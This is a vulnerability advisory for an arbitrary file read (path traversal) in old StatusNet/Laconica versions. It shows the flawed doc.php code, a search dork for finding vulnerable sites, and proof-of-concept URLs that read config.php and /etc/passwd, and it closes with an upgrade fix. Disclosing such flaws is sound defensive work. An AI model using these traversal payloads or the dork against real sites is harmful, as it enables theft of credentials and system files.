65 lines
No EOL
1.6 KiB
Text
65 lines
No EOL
1.6 KiB
Text
+-------------------------------------------------------------------------------+
|
|
+ StatusNet/Laconica <= 0.7.4, <= 0.8.2, <= 0.9.0beta3 - arbitrary file reading +
|
|
+-------------------------------------------------------------------------------+
|
|
|
|
# Date:
|
|
- 10/10/2013
|
|
|
|
# Exploit Author:
|
|
- spiderboy
|
|
|
|
# Vendor Homepage:
|
|
- http://status.net/
|
|
|
|
# Software Links:
|
|
- http://status.net/laconica-0.7.4.tar.gz
|
|
- http://status.net/statusnet-0.8.2.tar.gz
|
|
- http://status.net/statusnet-0.9.0beta3.tar.gz
|
|
|
|
# Version:
|
|
- Branch 0.7.X : <= 0.7.4
|
|
- Branch 0.8.X : <= 0.8.2
|
|
- Branch 0.9.X : <= 0.9.0beta3
|
|
|
|
# Tested on:
|
|
- Unix/Linux
|
|
|
|
# Category:
|
|
- Webapps
|
|
|
|
# Platform:
|
|
- php
|
|
|
|
# Advisories :
|
|
- http://status.net/wiki/Security_alert_0000002
|
|
- http://osvdb.org/show/osvdb/95586
|
|
|
|
# Google Dork:
|
|
- "It runs the StatusNet microblogging software, version 0.8.2"
|
|
|
|
# Vendor product description:
|
|
- Free and Open Source social software
|
|
|
|
# Vulnerable code:
|
|
- actions/doc.php:
|
|
--------------------------------------------------------------------
|
|
function handle($args)
|
|
{
|
|
parent::handle($args);
|
|
$this->title = $this->trimmed('title');
|
|
$this->filename = INSTALLDIR.'/doc-src/'.$this->title; //[1]
|
|
if (!file_exists($this->filename)) {
|
|
$this->clientError(_('No such document.'));
|
|
return;
|
|
}
|
|
$this->showPage();
|
|
}
|
|
--------------------------------------------------------------------
|
|
[1] : No check on user-supplied parameter $this->title
|
|
|
|
# Proof of concept:
|
|
- http://[host]/index.php?action=doc&title=../config.php
|
|
- http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd
|
|
|
|
# Solution:
|
|
- Upgrade to latest version : http://status.net/download |